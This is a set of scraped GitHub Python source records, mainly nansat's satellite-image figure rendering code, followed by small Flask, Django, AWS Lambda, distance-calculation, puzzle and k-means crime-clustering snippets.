etc. Used\n tgether with mask_array:\n {0, [0,0,0], 1, [100,100,100], 2: [150,150,150], 3: [0,0,255]}\n index\n\n - 0 - will have black color\n - 1 - dark gray\n - 2 - light gray\n - 3 - blue\n\n logoFileName : string\n name of the file with logo\n logoLocation : list of two int, default = [0,0]\n X and Y offset of the image\n If positive - offset is from left, upper edge\n If Negative - from right, lower edge\n Offset is calculated from the entire image legend inclusive\n logoSize : list of two int\n desired X,Y size of logo. If None - original size is used\n latGrid : numpy array\n full size array with latitudes. For adding lat/lon grid lines\n lonGrid : numpy array\n full size array with longitudes. For adding lat/lon grid lines\n nGridLines : int\n number of lat/lon grid lines to show\n latlonLabels : int\n number of lat/lon labels to show along each side.\n transparency : int\n transparency of the image background(mask), set for PIL alpha\n mask in Figure.save()\n default : None\n\n Other parameters\n ----------------\n LEGEND_HEIGHT : float, [0 1]\n 0.1, legend height relative to image height\n CBAR_HEIGHTMIN : int\n 5, minimum colorbar height, pixels\n CBAR_HEIGHT : float, [0 1]\n 0.15, colorbar height relative to image height\n CBAR_WIDTH : float [0 1]\n 0.8, colorbar width relative to legend width\n CBAR_LOCATION_X : float [0 1]\n 0.1, colorbar offset X relative to legend width\n CBAR_LOCATION_Y : float [0 1]\n 0.5, colorbar offset Y relative to legend height\n CBTICK_LOC_ADJUST_X : int\n 5, colorbar tick label offset X, pixels\n CBTICK_LOC_ADJUST_Y : int\n 3, colorbar tick label offset Y, pixels\n CAPTION_LOCATION_X : float, [0 1]\n 0.1, caption offset X relative to legend width\n CAPTION_LOCATION_Y : float, [0 1]\n 0.1, caption offset Y relative to legend height\n TITLE_LOCATION_X : float, [0 1]\n 0.1, title offset X relative to legend width\n TITLE_LOCATION_Y :\n 0.3, title offset Y relative to legend height\n DEFAULT_EXTENSION : string\n '.png'\n\n \"\"\"\n\n # default values of ALL params of Figure\n cmin = [0.]\n cmax = [1.]\n gamma = 2.\n subsetArraySize = 100000\n numOfColor = 250\n cmapName = 'jet'\n ratio = 1.0\n numOfTicks = 5\n titleString = ''\n caption = ''\n fontRatio = 1\n fontSize = None\n logarithm = False\n legend = False\n mask_array = None\n mask_lut = None\n\n logoFileName = None\n logoLocation = [0, 0]\n logoSize = None\n\n latGrid = None\n lonGrid = None\n lonTicks = 5\n latTicks = 5\n\n transparency = None\n\n LEGEND_HEIGHT = 0.1\n CBAR_HEIGHTMIN = 5\n CBAR_HEIGHT = 0.15\n CBAR_WIDTH = 0.8\n CBAR_LOCATION_X = 0.1\n CBAR_LOCATION_Y = 0.5\n CBTICK_LOC_ADJUST_X = 5\n CBTICK_LOC_ADJUST_Y = 3\n CAPTION_LOCATION_X = 0.1\n CAPTION_LOCATION_Y = 0.25\n TITLE_LOCATION_X = 0.1\n TITLE_LOCATION_Y = 0.05\n DEFAULT_EXTENSION = '.png'\n\n palette = None\n pilImg = None\n pilImgLegend = None\n\n extensionList = ['png', 'PNG', 'tif', 'TIF', 'bmp',\n 'BMP', 'jpg', 'JPG', 'jpeg', 'JPEG']\n\n _cmapName = 'jet'\n\n # instance attributes\n array = None\n def __init__(self, nparray, **kwargs):\n \"\"\" Set attributes\n\n See class Figure(object) for information about:\n\n Modifies\n --------\n\n Parameters\n ----------\n\n Advanced parameters\n --------------------\n\n \"\"\"\n # make a copy of nparray (otherwise a new reference to the same data is\n # created and the original input data is destroyed at process())\n array = np.array(nparray)\n\n self.logger = add_logger('Nansat')\n\n # if 2D array is given, reshape to 3D\n if array.ndim == 2:\n self.array = array.reshape(1, array.shape[0], array.shape[1])\n else:\n self.array = array\n\n # note swaping of axis by PIL\n self.width = self.array.shape[2]\n self.height = self.array.shape[1]\n\n # modify the default values using input values\n self._set_defaults(kwargs)\n\n # set fonts for Legend\n self.fontFileName = os.path.join(os.path.dirname(\n os.path.realpath(__file__)),\n 'fonts/DejaVuSans.ttf')\n\n def apply_logarithm(self, **kwargs):\n \"\"\"Apply a tone curve to the array\n\n After the normalization of the values from 0 to 1, logarithm is applied\n Then the values are converted to the normal scale.\n\n **Modifies**: self.array (numpy array)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # apply logarithm/gamme correction to pixel values\n for iBand in range(self.array.shape[0]):\n self.array[iBand, :, :] = (\n (np.power((self.array[iBand, :, :] - self.cmin[iBand]) /\n (self.cmax[iBand] - self.cmin[iBand]),\n (1.0 / self.gamma))) *\n (self.cmax[iBand] - self.cmin[iBand]) +\n self.cmin[iBand])\n\n def apply_mask(self, **kwargs):\n \"\"\"Apply mask for coloring land, clouds, etc\n\n If mask_array and mask_lut are provided as input parameters.\n The pixels in self.array which have index equal to mask_lut key\n in mask_array will have color equal to mask_lut value.\n\n **Modifies:** self.array (numpy array)\n\n Note\n ----\n apply_mask should be called only after convert_palettesize\n (i.e. to uint8 data)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # get values of free indices in the palette\n availIndices = range(self.numOfColor, 255 - 1)\n\n # for all lut color indices\n for i, maskValue in enumerate(self.mask_lut):\n if i < len(availIndices):\n # get color for that index\n maskColor = self.mask_lut[maskValue]\n # get indices for that index\n maskIndices = self.mask_array == maskValue\n # exchange colors\n if self.array.shape[0] == 1:\n # in a indexed image\n self.array[0][maskIndices] = availIndices[i]\n elif self.array.shape[0] == 3:\n # in RGB image\n for c in range(0, 3):\n self.array[c][maskIndices] = maskColor[c]\n\n # exchange palette\n self.palette[(availIndices[i] * 3):\n (availIndices[i] * 3 + 3)] = maskColor\n\n def add_logo(self, **kwargs):\n \"\"\"Insert logo into the PIL image\n\n Read logo from file as PIL.\n Resize to the given size.\n Pan using the given location.\n Paste into pilImg.\n\n **Modifies:** self.pilImg (PIL image)\n\n Parameters\n ----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # set/get default parameters\n self._set_defaults(kwargs)\n logoFileName = self.logoFileName\n logoLocation = self.logoLocation\n logoSize = self.logoSize\n\n # check if pilImg was created already\n if self.pilImg is None:\n self.logger.warning('Create PIL image first')\n return\n # check if file is available\n try:\n logoImg = Image.open(logoFileName)\n except:\n self.logger.warning('No logo file %s' % logoFileName)\n return\n # resize if required\n if logoSize is None:\n logoSize = logoImg.size\n else:\n logoImg = logoImg.resize(logoSize)\n # get location of the logo w.r.t. sign of logoLocation\n box = [0, 0, logoSize[0], logoSize[1]]\n for dim in range(2):\n if logoLocation[dim] >= 0:\n box[dim + 0] = box[dim + 0] + logoLocation[dim + 0]\n box[dim + 2] = box[dim + 2] + logoLocation[dim + 0]\n else:\n box[dim + 0] = (self.pilImg.size[dim + 0] +\n logoLocation[dim + 0] -\n logoSize[dim + 0])\n box[dim + 2] = (self.pilImg.size[dim + 0] +\n logoLocation[dim + 0])\n\n self.pilImg = self.pilImg.convert('RGB')\n self.pilImg.paste(logoImg, tuple(box))\n\n def add_latlon_grids(self, **kwargs):\n \"\"\"Add lat/lon grid lines into the PIL image\n\n Compute step of the grid.\n Make matrices with binarized lat/lon.\n Find edge (make line).\n Convert to mask.\n Add mask to PIL\n\n **Modifies:** self.pilImg (PIL image), added lat/lon grid lines\n\n Parameters\n ----------\n\n latGrid : numpy array\n array with values of latitudes\n lonGrid : numpy array\n array with values of longitudes\n lonTicks : int or list\n number of lines to draw\n or locations of gridlines\n latTicks : int or list\n number of lines to draw\n or locations of gridlines\n **kwargs : dict\n any of Figure parameters\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n\n # test availability of grids\n if (self.latGrid is None or self.lonGrid is None):\n return\n\n # get vectors with ticks based on input\n latTicks = self._get_auto_ticks(self.latTicks, self.latGrid)\n lonTicks = self._get_auto_ticks(self.lonTicks, self.lonGrid)\n\n # convert lat/lon grids to indices\n latI = np.zeros(self.latGrid.shape, 'int8')\n lonI = np.zeros(self.latGrid.shape, 'int8')\n for latTick in latTicks:\n latI[self.latGrid > latTick] += 1\n for lonTick in lonTicks:\n lonI[self.lonGrid > lonTick] += 1\n\n # find pixels on the grid lines (binarize)\n latI = np.sum(np.gradient(latI), axis=0)\n lonI = np.sum(np.gradient(lonI), axis=0)\n\n # Set border pixels equal to nearest neighbouring pixels - the error\n # should be minor (alternatively, they should all be 0) - this and the\n # two lines above solve VisibleDeprecationWarning in numpy<1.13.0 and\n # IndexError in numpy>=1.13.0\n latI[latI.shape[0]-1, :] = latI[latI.shape[0]-2, :]\n latI[:, latI.shape[0]-1] = latI[:, latI.shape[0]-2]\n lonI[lonI.shape[0]-1, :] = lonI[lonI.shape[0]-2, :]\n lonI[:, lonI.shape[0]-1] = lonI[:, lonI.shape[0]-2]\n\n # make grid from both lat and lon\n latI += lonI\n latI[latI != 0] = 1\n\n # add mask to the image\n self.apply_mask(mask_array=latI, mask_lut={1: [255, 255, 255]})\n\n def _get_auto_ticks(self, ticks, grid):\n \"\"\"Automatically create a list of lon or lat ticks from number of list\n\n Parameters\n ----------\n ticks : int or list\n number or location of ticks\n grid : ndarray\n grid with lon or lat\n Returns\n -------\n ticks : list\n location of ticks\n\n \"\"\"\n gridMin = grid.min()\n gridMax = grid.max()\n\n if type(ticks) is int:\n ticks = np.linspace(gridMin, gridMax, ticks)\n elif type(ticks) in [list, tuple]:\n newTicks = []\n for tick in ticks:\n if tick >= gridMin and tick <= gridMax:\n newTicks.append(tick)\n ticks = newTicks\n else:\n raise ValueError('Incorrect type of ticks')\n\n return ticks\n\n def add_latlon_labels(self, **kwargs):\n \"\"\"Add lat/lon labels along upper and left side\n\n Compute step of lables.\n Get lat/lon for these labels from latGrid, lonGrid\n Print lables to PIL in white.\n\n **Modifies:** self.pilImg (PIL image), added lat/lon labels\n\n Parameters\n ----------\n latGrid : numpy array\n array with values of latitudes\n lonGrid : numpy array\n array with values of longitudes\n lonTicks : int or list\n number of lines to draw\n or locations of gridlines\n latTicks : int or list\n number of lines to draw\n or locations of gridlines\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n\n # test availability of grids\n if (self.latGrid is None or self.lonGrid is None):\n return\n\n draw = ImageDraw.Draw(self.pilImg)\n font = ImageFont.truetype(self.fontFileName, self.fontSize)\n\n # get vectors with ticks based on input\n latTicks = self._get_auto_ticks(self.latTicks, self.latGrid)\n lonTicks = self._get_auto_ticks(self.lonTicks, self.lonGrid)\n\n # get corresponding lons from upper edge and lats from left edge\n lonTicksIdx = self._get_tick_index_from_grid(lonTicks, self.lonGrid,\n 1, self.lonGrid.shape[1])\n latTicksIdx = self._get_tick_index_from_grid(latTicks, self.latGrid,\n self.lonGrid.shape[0], 1)\n\n # draw lons\n lonsOffset = self.lonGrid.shape[1] / len(lonTicksIdx) / 8.\n for lonTickIdx in lonTicksIdx:\n lon = self.lonGrid[0, lonTickIdx]\n draw.text((lonTickIdx+lonsOffset, 0), '%4.2f' % lon,\n fill=255, font=font)\n\n # draw lats\n latsOffset = self.latGrid.shape[0] / len(latTicksIdx) / 8.\n for latTickIdx in latTicksIdx:\n lat = self.latGrid[latTickIdx, 0]\n draw.text((0, latTickIdx+latsOffset), '%4.2f' % lat,\n fill=255, font=font)\n\n def _get_tick_index_from_grid(self, ticks, grid, rows, cols):\n \"\"\"Get index of pixels from lon/lat grids closest given ticks\n\n Parameters\n ----------\n ticks : int or list\n number or location of ticks\n grid : ndarray\n grid with lon or lat\n rows : int\n from which rows to return pixels\n cols : int\n from which cols to return pixels\n\n Returns\n -------\n ticks : list\n index of ticks\n\n \"\"\"\n newTicksIdx = []\n for tick in ticks:\n diff = np.abs(grid[:rows, :cols] - tick).flatten()\n minDiffIdx = np.nonzero(diff == diff.min())[0][0]\n if minDiffIdx > 0:\n newTicksIdx.append(minDiffIdx)\n return newTicksIdx\n\n def clim_from_histogram(self, **kwargs):\n \"\"\"Estimate min and max pixel values from histogram\n\n if ratio=1.0, simply the minimum and maximum values are returned.\n if 0 < ratio < 1.0, get the histogram of the pixel values.\n Then get rid of (1.0-ratio)/2 from the both sides and\n return the minimum and maximum values.\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n Returns\n --------\n clim : numpy array 2D ((3x2) or (1x2))\n minimum and maximum pixel values for each band\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n ratio = self.ratio\n\n # find masked pixels if mask_array and mask_lut provided\n masked = None\n if self.mask_array is not None and self.mask_lut is not None:\n masked = np.zeros(self.mask_array.shape, 'bool')\n for lutVal in self.mask_lut:\n masked = masked + (self.mask_array == lutVal)\n\n # create a ratio list for each band\n if not (isinstance(ratio, float) or isinstance(ratio, int)):\n raise ValueError('Incorrect input ratio %s' % str(ratio))\n\n # create a ratio list for each band\n if ratio <= 0 or ratio > 1:\n raise ValueError('Incorrect input ratio %s' % str(ratio))\n\n # create a 2D array and set min and max values\n clim = [[0] * self.array.shape[0], [0] * self.array.shape[0]]\n for iBand in range(self.array.shape[0]):\n bandArray = self.array[iBand, :, :]\n # remove masked data\n if masked is not None:\n bandArray = bandArray[masked == 0]\n # remove nan, inf\n bandArray = bandArray[np.isfinite(bandArray)]\n # get percentile\n percentileMin = 100 * (1 - ratio) / 2.\n percentileMax = 100 * (1 - (1 - ratio) / 2.)\n if bandArray.size > 0:\n clim[0][iBand] = np.percentile(bandArray, percentileMin)\n clim[1][iBand] = np.percentile(bandArray, percentileMax)\n else:\n clim[0][iBand], clim[1][iBand] = 0, 1\n\n self.color_limits = clim\n return clim\n\n def clip(self, **kwargs):\n \"\"\"Convert self.array to values between cmin and cmax\n\n if pixel value < cmin, replaced to cmin.\n\n if pixel value > cmax, replaced to cmax.\n\n **Modifies:** self.array (numpy array)\n\n **Modifies:** self.cmin, self.cmax : allowed min/max values\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n for iBand in range(self.array.shape[0]):\n # if clipping integer matrix, make clipping ranges valid\n if self.array.dtype in ['int8', 'uint8', 'int16', 'uint16']:\n self.cmin[iBand] = np.ceil(self.cmin[iBand])\n self.cmin[iBand] = np.floor(self.cmin[iBand])\n\n # Clipping, allowing for reversed colorscale (cmin > cmax)\n clipMin = np.min([self.cmin[iBand], self.cmax[iBand]])\n clipMax = np.max([self.cmin[iBand], self.cmax[iBand]])\n self.array[iBand, :, :] = np.clip(self.array[iBand, :, :],\n clipMin, clipMax)\n\n def convert_palettesize(self, **kwargs):\n \"\"\"Convert self.array to palette color size in uint8\n\n **Modifies:** self.array (numpy array)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n\n for iBand in range(self.array.shape[0]):\n self.array[iBand, :, :] = (\n (self.array[iBand, :, :].astype('float32') -\n self.cmin[iBand]) *\n (self.numOfColor - 1) /\n (self.cmax[iBand] - self.cmin[iBand]))\n\n self.array = self.array.astype(np.uint8)\n\n def create_legend(self, **kwargs):\n \"\"\"self.legend is replaced from None to PIL image\n\n PIL image includes colorbar, caption, and titleString.\n\n **Modifies:** self.legend (PIL image)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # set fonts size for colorbar\n font = ImageFont.truetype(self.fontFileName, self.fontSize)\n\n # create a pilImage for the legend\n self.pilImgLegend = Image.new('P', (self.width,\n int(self.height *\n self.LEGEND_HEIGHT)), 255)\n draw = ImageDraw.Draw(self.pilImgLegend)\n\n # set black color\n if self.array.shape[0] == 1:\n black = 254\n else:\n black = (0, 0, 0)\n\n # if 1 band, draw the color bar\n if self.array.shape[0] == 1:\n # make an array for color bar\n bar = np.outer(np.ones(max(int(self.pilImgLegend.size[1] *\n self.CBAR_HEIGHT), self.CBAR_HEIGHTMIN)),\n np.linspace(0, self.numOfColor,\n int(self.pilImgLegend.size[0] *\n self.CBAR_WIDTH)))\n # create a colorbar pil Image\n pilImgCbar = Image.fromarray(np.uint8(bar))\n # paste the colorbar pilImage on Legend pilImage\n self.pilImgLegend.paste(pilImgCbar,\n (int(self.pilImgLegend.size[0] *\n self.CBAR_LOCATION_X),\n int(self.pilImgLegend.size[1] *\n self.CBAR_LOCATION_Y)))\n # create a scale for the colorbar\n scaleLocation = np.linspace(0, 1, self.numOfTicks)\n scaleArray = scaleLocation\n if self.logarithm:\n scaleArray = (np.power(scaleArray, (1.0 / self.gamma)))\n scaleArray = (scaleArray * (self.cmax[0] -\n self.cmin[0]) + self.cmin[0])\n scaleArray = list(map(self._round_number, scaleArray))\n # draw scales and lines on the legend pilImage\n for iTick in range(self.numOfTicks):\n coordX = int(scaleLocation[iTick] *\n self.pilImgLegend.size[0] *\n self.CBAR_WIDTH +\n int(self.pilImgLegend.size[0] *\n self.CBAR_LOCATION_X))\n\n box = (coordX, int(self.pilImgLegend.size[1] *\n self.CBAR_LOCATION_Y),\n coordX, int(self.pilImgLegend.size[1] *\n (self.CBAR_LOCATION_Y +\n self.CBAR_HEIGHT)) - 1)\n draw.line(box, fill=black)\n box = (coordX + self.CBTICK_LOC_ADJUST_X,\n int(self.pilImgLegend.size[1] *\n (self.CBAR_LOCATION_Y +\n self.CBAR_HEIGHT)) +\n self.CBTICK_LOC_ADJUST_Y)\n draw.text(box, scaleArray[iTick], fill=black, font=font)\n\n # draw longname and units\n box = (int(self.pilImgLegend.size[0] * self.CAPTION_LOCATION_X),\n int(self.pilImgLegend.size[1] * self.CAPTION_LOCATION_Y))\n draw.text(box, str(self.caption), fill=black, font=font)\n\n # if titleString is given, draw it\n if self.titleString != '':\n # write text each line onto pilImgCanvas\n textHeight = int(self.pilImgLegend.size[1] *\n self.TITLE_LOCATION_Y)\n for line in self.titleString.splitlines():\n draw.text((int(self.pilImgLegend.size[0] *\n self.TITLE_LOCATION_X),\n textHeight), line, fill=black, font=font)\n text = draw.textsize(line, font=font)\n textHeight += text[1]\n\n def create_pilImage(self, **kwargs):\n \"\"\"self.create_pilImage is replaced from None to PIL image\n\n If three images are given, create a image with RGB mode.\n if self.pilImgLegend is not None, it is pasted.\n\n If one image is given, create a image with P(palette) mode.\n if self.pilImgLegend is not None,\n self.array is extended before create the pilImag and\n then paste pilImgLegend onto it.\n\n **Modifies:** self.pilImg (PIL image), PIL image with / without the legend\n\n **Modifies:** self.array (replace to None)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # if legend is created, expand array with empty space below the data\n if self.pilImgLegend is not None:\n appendArray = 255 * np.ones((self.array.shape[0],\n self.pilImgLegend.size[1],\n self.width), 'uint8')\n self.array = np.append(self.array, appendArray, 1)\n\n # create a new PIL image from three bands (RGB) or from one (palette)\n if self.array.shape[0] == 3:\n self.pilImg = Image.merge('RGB',\n (Image.fromarray(self.array[0, :, :]),\n Image.fromarray(self.array[1, :, :]),\n Image.fromarray(self.array[2, :, :])))\n else:\n self.pilImg = Image.fromarray(self.array[0, :, :])\n self.pilImg.putpalette(self.palette)\n\n # append legend\n if self.pilImgLegend is not None:\n self.pilImg.paste(self.pilImgLegend, (0, self.height))\n\n def process(self, **kwargs):\n \"\"\"Do all common operations for preparation of a figure for saving\n\n #. Modify default values of parameters by the provided ones (if any)\n #. Clip to min/max\n #. Apply logarithm if required\n #. Convert data to uint8\n #. Create palette\n #. Apply mask for colouring land, clouds, etc if required\n #. Create legend if required\n #. Create PIL image\n #. Add logo if required\n\n **Modifies:** self.d\n\n **Modifies:** self.array\n\n **Modifies:** self.palette\n\n **Modifies:** self.pilImgLegend\n\n **Modifies:** self.pilImg\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # set fontSize using fontRatio if fontSize is not given at input\n if self.fontSize is None:\n self.fontSize = int(self.array.shape[1] / 45. * self.fontRatio)\n\n # if the image is reprojected it has 0 values\n # we replace them with mask before creating PIL Image\n self.reprojMask = self.array[0, :, :] == 0\n\n # clip values to min/max\n self.clip()\n\n # apply logarithm\n if self.logarithm:\n self.apply_logarithm()\n\n # convert to uint8\n self.convert_palettesize()\n\n # create the paletter\n self._create_palette()\n\n # apply colored mask (land mask, cloud mask and something else)\n if self.mask_array is not None and self.mask_lut is not None:\n self.apply_mask()\n\n # add lat/lon grids lines if latGrid and lonGrid are given\n self.add_latlon_grids()\n\n # append legend\n if self.legend:\n self.create_legend()\n\n # create PIL image ready for saving\n self.create_pilImage(**kwargs)\n\n # add labels with lats/lons\n self.add_latlon_labels()\n\n # add logo\n if self.logoFileName is not None:\n self.add_logo()\n\n def _make_transparent_color(self):\n \"\"\"makes colors specified by self.transparency\n and self.reprojMask (if the image is reprojected) transparent\n\n **Modifies:** self.pilImg (PIL image), Adds transparency to PIL image\n\n \"\"\"\n self.pilImg = self.pilImg.convert('RGBA')\n datas = self.pilImg.getdata()\n newData = list()\n\n for item in datas:\n if (item[0] == self.transparency[0] and\n item[1] == self.transparency[1] and\n item[2] == self.transparency[2]):\n newData.append((255, 255, 255, 0))\n else:\n newData.append(item)\n\n self.pilImg.putdata(newData)\n\n # The alphaMask is set in process() before clip() the Image\n img = np.array(self.pilImg)\n img[:, :, 3][self.reprojMask] = 0\n self.pilImg = Image.fromarray(np.uint8(img))\n\n def save(self, fileName, **kwargs):\n \"\"\"Save self.pilImg to a physical file\n\n If given extension is JPG, convert the image mode from Palette to RGB.\n\n **Modifies:** self.pilImg (None)\n\n Parameters\n ----------\n fileName : string\n name of outputfile\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n\n if not((fileName.split('.')[-1] in self.extensionList)):\n fileName = fileName + self.DEFAULT_EXTENSION\n\n fileExtension = fileName.split('.')[-1]\n if fileExtension in ['jpg', 'JPG', 'jpeg', 'JPEG']:\n self.pilImg = self.pilImg.convert('RGB')\n\n if self.transparency is not None:\n self._make_transparent_color()\n self.pilImg.save(fileName)\n\n def _create_palette(self):\n \"\"\"Create a palette based on Matplotlib colormap name\n\n default number of color palette is 250.\n it means 6 colors are possible to use for other purposes.\n the last palette (255) is white and the second last (254) is black.\n\n **Modifies:** self.palette (numpy array) (uint8)\n\n \"\"\"\n if not MATPLOT_LIB_IS_INSTALLED:\n # Make grayscale colormap\n cmap = np.vstack([np.arange(256.),\n np.arange(256.),\n np.arange(256.),\n np.ones(256)*255]).T\n cmapLUT = cmap[:self.numOfColor, :]\n else:\n # test if given colormap name is in builtin or added colormaps\n try:\n cmap = cm.get_cmap(self.cmapName)\n except:\n self.logger.error('%s is not a valid colormap' % self.cmapName)\n self.cmapName = self._cmapName\n # get colormap by name\n cmap = cm.get_cmap(self.cmapName)\n # get colormap look-up\n cmapLUT = np.uint8(cmap(range(self.numOfColor)) * 255)\n\n # replace all last colors to black and...\n lut = np.zeros((3, 256), 'uint8')\n lut[:, :self.numOfColor] = cmapLUT.T[:3]\n # ...and the most last color to white\n lut[:, -1] = 255\n\n # set palette to be used by PIL\n self.palette = lut.T.flatten().astype(np.uint8)\n\n def _round_number(self, val):\n \"\"\"Return writing format for scale on the colorbar\n\n Parameters\n ----------\n val : int / float / exponential\n\n Returns\n --------\n colorbar format : str\n\n \"\"\"\n frmts = {-2: '%.2f', -1: '%.1f', 0: '%.2f',\n 1: '%.1f', 2: '%d', 3: '%d'}\n if val == 0:\n frmt = '%d'\n else:\n digit = floor(log10(abs(val)))\n if digit in frmts:\n frmt = frmts[digit]\n else:\n frmt = '%.' + '%d' % abs(digit) + 'f'\n\n return str(frmt % val)\n\n def _set_defaults(self, idict):\n \"\"\"Check input params and set default values\n\n Look through default parameters (self.d) and given parameters (dict)\n and paste value from input if the key matches\n\n Parameters\n ----------\n idict : dictionary\n parameter names and values\n\n Modifies\n --------\n default self attributes\n\n \"\"\"\n for key in idict:\n if hasattr(self, key):\n if key in ['cmin', 'cmax'] and type(idict[key]) != list:\n setattr(self, key, [idict[key]])\n else:\n setattr(self, key, idict[key])\n","repo_name":"nansencenter/nansat","sub_path":"nansat/figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":34808,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"61"} +{"seq_id":"70895170433","text":"'''Application Initialization'''\nimport logging\n\nfrom flask import Flask\nfrom flask_restful import (\n Resource,\n Api,\n)\nfrom resources import FontExtractionResource\n\napp = Flask(__name__)\n\napi = Api(app)\napi.add_resource(FontExtractionResource, '/font_extraction', endpoint='font_extraction')\n\n\nif __name__ == '__main__':\n '''Initialize app and run server'''\n logging.basicConfig(level=logging.DEBUG)\n logger = logging.getLogger(__name__)\n logger.debug(app.config.get('DEBUG'))\n app.run(debug=True, host='0.0.0.0')","repo_name":"kalliefriedman/font-family-parser","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34740945404","text":"from django.urls import path\n\n# local imports\nfrom user_profile.views.profile import ProfileUpdateView, ProfileView\nfrom user_profile.views.user import LoginView, RegisterView, LogOutView\napp_name = 'user_profile'\n\nurlpatterns = [\n path('logout/', LogOutView.as_view(), name='logout'),\n path('login/', LoginView.as_view(), name='login'),\n path('register/', RegisterView.as_view(), name='register'),\n path('profile/view/', ProfileView.as_view(), name='profile_view'),\n path(\n 'profile//update/', ProfileUpdateView.as_view(),\n name='profile_update'\n ),\n]\n","repo_name":"Rayhun/meal-management-system","sub_path":"user_profile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40781461452","text":"import json\nfrom crhelper import CfnResource\n\nhelper = CfnResource()\n\n@helper.create\ndef resolve(event, _):\n dictionary = json.loads(event['ResourceProperties']['String'])\n\n helper.Data.update(dictionary)\n\ndef handler(event, context):\n print(event)\n\n helper(event, context)\n","repo_name":"aws-samples/cloudformation-cross-stack-dependency","sub_path":"json-parser/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1400135899","text":"from itertools import combinations\r\nimport numpy as np\r\n\r\nthreshold = 200\r\n\r\ndef calc_distance(points):\r\n detect = np.zeros(len(points))\r\n seq = combinations(points, 2)\r\n for point in list(seq):\r\n distance = euclid(point[0], point[1])\r\n if int(distance) < threshold:\r\n detect[points.index(point[0])] = 1\r\n detect[points.index(point[1])] = 1\r\n return detect\r\n\r\ndef euclid(a, b):\r\n return ((a[0]-b[0])**2 + (a[1]-b[1])**2)**(1/2)","repo_name":"yesayayova/monitoring-pd","sub_path":"distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23571288051","text":"from heapq import *\n\ndef printResult(maxi, mini, number):\n print('Case #{}: {} {}'.format(number, maxi, mini))\n\nfor tc in range(int(input().strip())):\n n, k = [int(x) for x in input().strip().split()]\n maxHeap = []\n heappush(maxHeap, n * -1)\n for i in range(k):\n longest = heappop(maxHeap) * -1\n if longest == 0:\n Ls = 0\n Rs = 0\n else:\n Ls = int((longest - 1) / 2)\n Rs = longest - 1 - Ls\n heappush(maxHeap, Ls * -1)\n heappush(maxHeap, Rs * -1)\n if i == k - 1:\n printResult(max(Ls, Rs), min(Ls, Rs), tc+1)\n\n\n\n\n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2758.py","file_name":"2758.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32408223135","text":"import urllib.request\nimport json\nimport pandas as pd\nimport numpy as np\nimport dml\nimport prov.model\nimport datetime\nimport uuid\nimport sys\nfrom bson import json_util\nfrom sklearn.cluster import KMeans\nimport matplotlib as mp\nmp.use('Agg')\nimport matplotlib.pyplot as plt\n\nclass kmeans_crime_incidents(dml.Algorithm):\n contributor = 'esaracin'\n reads = ['esaracin.crime_incidents']\n writes = ['esaracin.crime_incident_centers']\n\n @staticmethod\n def execute(trial = False):\n '''Retrieves our data sets from Boston Open Data using specific URLs.\n Creates the necessary pymongo collections within our repo database.'''\n \n startTime = datetime.datetime.now()\n\n # Set up the database connection.\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('esaracin', 'esaracin')\n\n # Grab all of our two databases that we're reading from.\n # Note that, if trial is set to True, we only take a random, 5% sample\n # of our overall crime_incidents, to speed things up.\n dataset = repo['esaracin.crime_incidents'].find()\n df_crime = pd.DataFrame(list(dataset))\n if(trial == True):\n df_crime = df_crime.sample(frac=.05)\n\n\n\n # Extract the lat/long tuples.\n location = df_crime['Location']\n\n df_coordinates = {key:[] for key in ['Latitude', 'Longitude']}\n\n for index, row in df_crime.iterrows():\n lat_long = eval(row['Location'])\n \n # There are many entries without Lat/Long data; remove them so as\n # to avoid affecting the clustering.\n if(lat_long == (0, 0) or lat_long == (-1, -1)):\n continue\n\n df_coordinates['Latitude'] += [lat_long[0]]\n df_coordinates['Longitude'] += [lat_long[1]]\n\n df_coordinates = pd.DataFrame(df_coordinates)\n\n # Now, we can run kmeans++ on our set of coordinates to find the best\n # cluster centers.\n kmeans = KMeans(init='k-means++', n_clusters=5)\n kmeans.fit_predict(df_coordinates)\n clusters, centers = kmeans.labels_, kmeans.cluster_centers_\n\n\n new_df = {key:[] for key in ['Latitude', 'Longitude']}\n for center in centers:\n new_df['Latitude'] += 